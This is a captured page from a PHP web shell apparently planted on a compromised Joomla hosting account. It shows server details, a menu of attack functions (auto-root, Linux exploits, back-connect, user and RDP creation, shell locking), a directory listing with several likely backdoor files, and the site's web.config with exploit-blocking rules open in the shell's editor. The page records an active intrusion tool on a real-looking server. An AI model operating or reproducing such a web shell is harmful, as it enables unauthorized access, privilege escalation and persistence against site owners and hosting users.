Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
[ HOME SHELL ]
Name
Size
Permission
Action
0cb02
[ DIR ]
dr-xr-xr-x
TSBHmeRiZ
[ DIR ]
drwxr-xr-x
Vsujmq
[ DIR ]
drwxr-xr-x
administrator
[ DIR ]
drwxr-xr-x
api
[ DIR ]
drwxr-xr-x
cache
[ DIR ]
drwxr-xr-x
cli
[ DIR ]
drwxr-xr-x
components
[ DIR ]
drwxr-xr-x
ed0d16
[ DIR ]
drwxr-xr-x
gCrweWphB
[ DIR ]
drwxr-xr-x
http:
[ DIR ]
drwxr-xr-x
https:
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
language
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
libraries
[ DIR ]
drwxr-xr-x
media
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
niLYg
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
tmp
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
zenit
[ DIR ]
drwxr-xr-x
.htaccess
1.13
KB
-r-xr-xr-x
LICENSE.txt
17.67
KB
-rw----r--
README.txt
4.83
KB
-rw----r--
about.php
5.62
KB
-rw-r--r--
configuration.php
3.52
KB
-rw-r--r--
configuration_old.php
3.46
KB
-rw----r--
configuration_old2.php
3.55
KB
-r--r--r--
configuration_old33.php
3.56
KB
-rw-r--r--
ex.php
5.96
KB
-rw-r--r--
file.php
80.47
KB
-rw-r--r--
file2.php
96.38
KB
-rw-r--r--
gtaavijg.php
760
B
-rw-r--r--
htaccess.txt
6.6
KB
-rw----r--
index.php
35.37
KB
-r-xr-xr-x
index.php0
23.01
KB
-rw-r--r--
item.php
1.87
KB
-r--r--r--
pages.php
1.46
KB
-r--r--r--
paypaladvanced_2_6279148dd013c...
620
B
-rw-r--r--
paypaladvanced_cancel_2.php
578
B
-rw-r--r--
paypaladvanced_return_2.php
578
B
-rw-r--r--
php.ini
40
B
-rw-r--r--
plugins.php
2.03
KB
-r--r--r--
postnews.php
5.04
KB
-rw-r--r--
product.php
1.29
KB
-r--r--r--
radio.php
5.96
KB
-rw-r--r--
robots.txt
390
B
-r--r--r--
robots.txt.dist
764
B
-rw----r--
web.config.txt
2.9
KB
-rw----r--
wp-blog-header.php
0
B
-rw-r--r--
wp-load.php
0
B
-rw-r--r--
wp-login.php
5.62
KB
-rw-r--r--
ycc.php
3.68
KB
-rw-r--r--
yprhgrdk.php
760
B
-rw-r--r--
zeez.php
3.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : web.config.txt
<?xml version="1.0" encoding="UTF-8"?> <configuration> <location path="."> <system.webServer> <directoryBrowse enabled="false" /> <rewrite> <rules> <rule name="Joomla! Common Exploits Prevention" stopProcessing="true"> <match url="^(.*)$" ignoreCase="false" /> <conditions logicalGrouping="MatchAny"> <add input="{QUERY_STRING}" pattern="base64_encode[^(]*\([^)]*\)" ignoreCase="false" /> <add input="{QUERY_STRING}" pattern="(>|%3C)([^s]*s)+cript.*(<|%3E)" /> <add input="{QUERY_STRING}" pattern="GLOBALS(=|\[|\%[0-9A-Z]{0,2})" ignoreCase="false" /> <add input="{QUERY_STRING}" pattern="_REQUEST(=|\[|\%[0-9A-Z]{0,2})" ignoreCase="false" /> </conditions> <action type="CustomResponse" url="index.php" statusCode="403" statusReason="Forbidden" statusDescription="Forbidden" /> </rule> <rule name="Joomla! API Application SEF URLs"> <match url="^api/(.*)" ignoreCase="false" /> <conditions logicalGrouping="MatchAll"> <add input="{URL}" pattern="^/api/index.php" ignoreCase="true" negate="true" /> <add input="{REQUEST_FILENAME}" matchType="IsFile" ignoreCase="false" negate="true" /> <add input="{REQUEST_FILENAME}" matchType="IsDirectory" ignoreCase="false" negate="true" /> </conditions> <action type="Rewrite" url="api/index.php" /> </rule> <rule name="Joomla! Public Frontend SEF URLs"> <match url="(.*)" ignoreCase="false" /> <conditions logicalGrouping="MatchAll"> <add input="{URL}" pattern="^/index.php" ignoreCase="true" negate="true" /> <add input="{REQUEST_FILENAME}" matchType="IsFile" ignoreCase="false" negate="true" /> <add input="{REQUEST_FILENAME}" matchType="IsDirectory" ignoreCase="false" negate="true" /> </conditions> <action type="Rewrite" url="index.php" /> </rule> </rules> </rewrite> <httpProtocol> <customHeaders> <add name="X-Content-Type-Options" value="nosniff" /> <!-- Protect against certain cross-origin requests. More information can be found here: --> <!-- https://developer.mozilla.org/en-US/docs/Web/HTTP/Cross-Origin_Resource_Policy_(CORP) --> <!-- https://web.dev/why-coop-coep/ --> <!-- <add name="Cross-Origin-Resource-Policy" value="same-origin" /> --> <!-- <add name="Cross-Origin-Embedder-Policy" value="require-corp" /> --> </customHeaders> </httpProtocol> </system.webServer> </location> </configuration>
Close